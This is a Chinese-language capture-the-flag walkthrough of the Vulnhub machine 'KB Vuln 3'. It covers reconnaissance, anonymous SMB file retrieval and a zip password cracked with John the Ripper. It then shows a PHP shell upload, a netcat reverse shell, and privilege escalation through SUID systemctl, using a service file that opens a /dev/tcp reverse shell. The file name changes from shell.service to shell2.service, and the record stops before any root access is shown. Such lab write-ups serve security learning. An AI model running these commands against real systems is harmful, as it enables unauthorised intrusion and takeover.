KB Vuln 3
作者:jason huawen
识别目标主机IP地址
─(kali㉿kali)-[~/Vulnhub/KBVuln3]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:06 1 60 Unknown vendor
192.168.56.100 08:00:27:69:ef:ae 1 60 PCS Systemtechnik GmbH
192.168.56.254 08:00:27:38:ea:a0 1 60 PCS Systemtechnik GmbH
利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.254
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/KBVuln3]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-11 19:35 EDT
Nmap scan report for bogon (192.168.56.254)
Host is up (0.00042s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 cb04f0363f42f73ace2ff54ce0abfe17 (RSA)
| 256 6106df25d5e1e347fe1394fd740c8500 (ECDSA)
|_ 256 5089b6b43a0b6e63121040e2c4f93533 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
MAC Address: 08:00:27:38:EA:A0 (Oracle VirtualBox virtual NIC)
Service Info: Host: KB-SERVER; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: KB-SERVER, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb2-time:
| date: 2023-04-11T23:35:58
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: kb-server
| NetBIOS computer name: KB-SERVER\x00
| Domain name: \x00
| FQDN: kb-server
|_ System time: 2023-04-11T23:35:58+00:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.75 seconds
NMAP扫描结果表明目标主机有4个开放端口:22(ssh)、80(http)、139/445(samba)
获得Shell
┌──(kali㉿kali)-[~/Vulnhub/KBVuln3]
└─$ smbclient -L 192.168.56.254
Password for [WORKGROUP\kali]:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Files Disk HACK ME
IPC$ IPC IPC Service (Samba 4.7.6-Ubuntu)
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP KB-SERVER
┌──(kali㉿kali)-[~/Vulnhub/KBVuln3]
└─$ smbclient //192.168.56.254/Files
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Oct 2 14:11:49 2020
.. D 0 Fri Oct 2 13:12:00 2020
website.zip N 38936127 Fri Oct 2 14:11:41 2020
14380040 blocks of size 1024. 9540188 blocks available
smb: \> get website.zip
getting file \website.zip of size 38936127 as website.zip (121094.1 KiloBytes/sec) (average 121094.1 KiloBytes/sec)
smb: \> pwd
Current directory is \\192.168.56.254\Files\
smb: \> cd /var
cd \var\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \> quit
通过smbclient工具连接目标主机的smb服务,将共享目录中的文件下载到Kali Linux。
─(kali㉿kali)-[~/Vulnhub/KBVuln3]
└─$ enum4linux 192.168.56.254
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\heisenberg (Local User)
enum4linux工具识别出目标主机存在用户名heisenberg
┌──(kali㉿kali)-[~/Vulnhub/KBVuln3]
└─$ ls -alh
total 38M
drwxr-xr-x 2 kali kali 4.0K Apr 11 19:38 .
drwxr-xr-x 89 kali kali 4.0K Apr 11 19:34 ..
-rw-r--r-- 1 root root 1.8K Apr 11 19:35 nmap_full_scan
-rw-r--r-- 1 kali kali 38M Apr 11 19:38 website.zip
┌──(kali㉿kali)-[~/Vulnhub/KBVuln3]
└─$ unzip website.zip
Archive: website.zip
[website.zip] README.txt password:
website.zip被加密,可以用ziptojohn转换为哈希值,然后利用John the ripper工具进行破解
─$ zip2john website.zip > hashes
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes --force
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
porchman (website.zip)
1g 0:00:00:00 DONE (2023-04-11 19:40) 1.886g/s 8617Kp/s 8617Kc/s 8617KC/s porno852..poppy670
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(kali㉿kali)-[~/Vulnhub/KBVuln3]
└─$ cat README.txt
Hi Heisenberg! Your website is activated. --> kb.vuln
Username : admin
Password : jesse
Have a good day !
应该是网站的用户名密码,暂时放在一边。
┌──(kali㉿kali)-[~/Vulnhub/KBVuln3/sitemagic]
└─$ nikto -h http://192.168.56.254
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.254
+ Target Hostname: 192.168.56.254
+ Target Port: 80
+ Start Time: 2023-04-11 19:44:48 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 2240, size: 5b0b40b8dd680, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: HEAD, GET, POST, OPTIONS
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2023-04-11 19:45:44 (GMT-4) (56 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
根据README.txt文件,是不是要将kb.vuln添加到/etc/hosts文件中?
┌──(kali㉿kali)-[~/Vulnhub/KBVuln3/sitemagic]
└─$ sudo vim /etc/hosts
┌──(kali㉿kali)-[~/Vulnhub/KBVuln3/sitemagic]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.56.254 kb.vuln
刷新页面,此时返回的页面就不是page not found,其中有Login链接,尝试用前面的Readme.txt中的用户名密码登录,可以成功登录,接下来的目标是将shell.php上传,上传文件没有任何限制,但是文件放在什么位置呢?
从页面源代码:
div class="SMPagesTableCell" ><img style="border-radius: 5px; box-shadow: 0px 0px 7px -1px #333;" title="/Sunrise2/People.jpg" src="files/images/Sunrise2/People.jpg" alt="/Sunrise2/People.jpg" width="545" height="270"></div>
可以猜测文件位置为:
files/images/
需要将shell.php上传到images/backgrounds目录下,即可访问
http://kb.vuln/files/images/backgrounds/shell.php
┌──(kali㉿kali)-[~/Vulnhub/KBVuln3/sitemagic]
└─$ sudo nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 38966
Linux kb-server 4.15.0-118-generic #119-Ubuntu SMP Tue Sep 8 12:30:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
00:04:41 up 34 min, 0 users, load average: 0.86, 0.42, 0.55
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@kb-server:/$ cd /home
cd /home
www-data@kb-server:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x 3 root root 4.0K Oct 2 2020 .
drwxr-xr-x 24 root root 4.0K Oct 2 2020 ..
drwxr-xr-x 4 heisenberg heisenberg 4.0K Oct 2 2020 heisenberg
www-data@kb-server:/home$ cd heisengerg
cd heisengerg
bash: cd: heisengerg: No such file or directory
www-data@kb-server:/home$ cd heisenberg
cd heisenberg
www-data@kb-server:/home/heisenberg$ ls -alh
ls -alh
total 32K
drwxr-xr-x 4 heisenberg heisenberg 4.0K Oct 2 2020 .
drwxr-xr-x 3 root root 4.0K Oct 2 2020 ..
-rw-r--r-- 1 heisenberg heisenberg 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 heisenberg heisenberg 3.7K Apr 4 2018 .bashrc
drwx------ 2 heisenberg heisenberg 4.0K Oct 2 2020 .cache
drwx------ 3 heisenberg heisenberg 4.0K Oct 2 2020 .gnupg
-rw-r--r-- 1 heisenberg heisenberg 807 Apr 4 2018 .profile
-rw-r--r-- 1 heisenberg heisenberg 0 Oct 2 2020 .sudo_as_admin_successful
-rw-r--r-- 1 root root 33 Oct 2 2020 user.txt
www-data@kb-server:/home/heisenberg$ cat user.txt
cat user.txt
6346c6d19751f1a3195f1e4b4b609544
www-data@kb-server:/home/heisenberg$
从而得到user flag
提权
www-data@kb-server:/var/www/html/sitemagic$ find / -perm -4000 -type f 2>/dev/null
<l/sitemagic$ find / -perm -4000 -type f 2>/dev/null
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/at
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/newgidmap
/usr/bin/passwd
/usr/bin/traceroute6.iputils
/bin/systemctl
/bin/umount
/bin/su
/bin/mount
/bin/fusermount
/bin/ping
可以利用systemctl的SUID位进行提权,参考GTFOBINS网站给出的参考步骤进行提权
sudo install -m =xs $(which systemctl) .
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "id > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
./systemctl link $TF
./systemctl enable --now $TF
因此接下来编写一个service文件,Spawn一个新的反弹shell
┌──(kali㉿kali)-[~/Vulnhub/KBVuln3]
└─$ cat shell.service
[Service]
Type=oneshot
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/192.168.56.206/6666 0>&1'
[Install]
WantedBy=multi-user.target
将shell.service文件上传到目标主机/tmp目录
www-data@kb-server:/tmp$ wget http://192.168.56.206:8000/shell.service
wget http://192.168.56.206:8000/shell.service
--2023-04-12 00:31:31-- http://192.168.56.206:8000/shell.service
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 132 [application/octet-stream]
Saving to: 'shell.service'
shell.service 100%[===================>] 132 --.-KB/s in 0s
2023-04-12 00:31:31 (46.4 MB/s) - 'shell.service' saved [132/132]
将shell.service 移动到网站目录
www-data@kb-server:/var/www/html/sitemagic$ mv /tmp/shell.service .
mv /tmp/shell.service .
然后创建服务
www-data@kb-server:/var/www/html/sitemagic$ systemctl link /var/www/html/sitemagic/shell2.service
启动服务
www-data@kb-server:/var/www/html/sitemagic$ systemctl start shell2.service